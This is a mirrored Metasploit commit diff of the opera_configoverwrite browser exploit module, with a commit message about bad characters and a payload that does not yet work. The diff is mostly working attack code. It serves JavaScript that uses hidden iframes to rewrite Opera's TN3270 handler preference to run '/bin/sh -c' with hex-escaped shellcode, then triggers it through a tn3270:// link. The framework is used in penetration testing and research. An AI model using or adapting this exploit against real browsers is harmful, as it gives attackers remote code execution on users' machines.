infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

see #594. remove some extraneous junk, don't run the shell in a terminal (it dies immediately). space is the only badchar. still doesn't actually work without a modification to encoder/cmd/generic_sh. 

git-svn-id: file:///home/svn/framework3/trunk@7680 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2009-12-03 09:09:56 +00:00
parent 8e5d2b98b0
commit 8e0eef03c6
1 changed files with 29 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
modules/exploits/multi/browser/opera_configoverwrite.rb
View File

@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
'ExitFunc' => 'process', 'ExitFunc' => 'process',
'Space' => 2048, 'Space' => 2048,
'DisableNops' => true, 'DisableNops' => true,
'BadChars' => " |'<>&", 'BadChars' => " ",
}, },
'Targets' => 'Targets' =>
[ [
@ -71,27 +71,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Not sure when this was disclosed but it's been known since at # Not sure when this was disclosed but it's been known since at
# least March 5, 2007, since that's the release date on the version # least March 5, 2007, since that's the release date on the version
# of mpack I stole this from. # of mpack I stole this from.
'DisclosureDate' => 'Mar 5 2007' 'DisclosureDate' => 'Mar 5 2007',
'DefaultTarget' => 0
})) }))
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status("Got request #{request.uri}")
case request.uri case request.uri
when /payload$/
print_status("Generating payload for #{target} #{target.platform}")
# Re-generate the payload
if ((p = regenerate_payload(cli)) == nil)
print_error("Payload generation failed, 404ing request for #{request.uri}")
send_not_found(cli)
return
end
# NOTE: Change this to the new API when commiting to trunk
#content = Msf::Util::EXE.to_win32pe(p.encoded)
#content = Rex::Text.to_win32pe(p.encoded)
content = "foo"
print_status("Generated #{content.length} bytes")
headers = { 'Content-Type' => 'application/octet-stream' }
when get_resource when get_resource
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
content = "<body><script>" content = "<body><script>"
@ -105,13 +93,17 @@ class Metasploit3 < Msf::Exploit::Remote
end end
send_response_html(cli, content, headers) send_response_html(cli, content, headers)
print_status("Done with request #{request.uri}")
end end
def generate_evil_js(cli, request) def generate_evil_js(cli, request)
# There are a bunch of levels of quotes here, so the easiest way to # There are a bunch of levels of quotes here, so the easiest way to
# make everything line up is to hex escape the command to run # make everything line up is to hex escape the command to run
p = regenerate_payload(cli).encoded p = regenerate_payload(cli).encoded
#print_status(p) $stdout.puts(p.class)
print_status(p)
send_not_found(cli) && return if not p
shellcode = Rex::Text.to_hex(p, "%") shellcode = Rex::Text.to_hex(p, "%")
js = <<ENDJS js = <<ENDJS
blank_iframe = document.createElement('iframe'); blank_iframe = document.createElement('iframe');
@ -121,33 +113,32 @@ blank_iframe.setAttribute('style', 'display:none');
document.body.appendChild(blank_iframe); document.body.appendChild(blank_iframe);
blank_iframe_window.eval( blank_iframe_window.eval(
"config_iframe = document.createElement('iframe');" + "config_iframe = document.createElement('iframe');" +
"config_iframe.setAttribute('id', 'config_iframe_window');" + "config_iframe.setAttribute('id', 'config_iframe_window');" +
"config_iframe.src = 'opera:config';" + "config_iframe.src = 'opera:config';" +
"document.body.appendChild(config_iframe);" + "document.body.appendChild(config_iframe);" +
"cache_iframe = document.createElement('iframe');" + "cache_iframe = document.createElement('iframe');" +
"cache_iframe.src = 'opera:cache';" + "cache_iframe.src = 'opera:cache';" +
"cache_iframe.onload = function ()" + "cache_iframe.onload = function ()" +
"{" + "{" +
" config_iframe_window.eval" + " config_iframe_window.eval" +
" (\\"" + " (\\"" +
" old_handler = opera.getPreference('Network','TN3270 App');" + " old_handler = opera.getPreference('Network','TN3270 App');" +
" old_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
" shellcode = '#{shellcode}';" + " shellcode = '#{shellcode}';" +
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" + " opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
" app_link = document.createElement('a');" + " opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" + " app_link = document.createElement('a');" +
" app_link.click();" + " app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" + " app_link.click();" +
" \\");" + " setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
"};" + " setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
"document.body.appendChild(cache_iframe);" + " \\");" +
"};" +
"document.body.appendChild(cache_iframe);" +
""); "");
ENDJS ENDJS
end end
def generate_evil_preference()
end
end end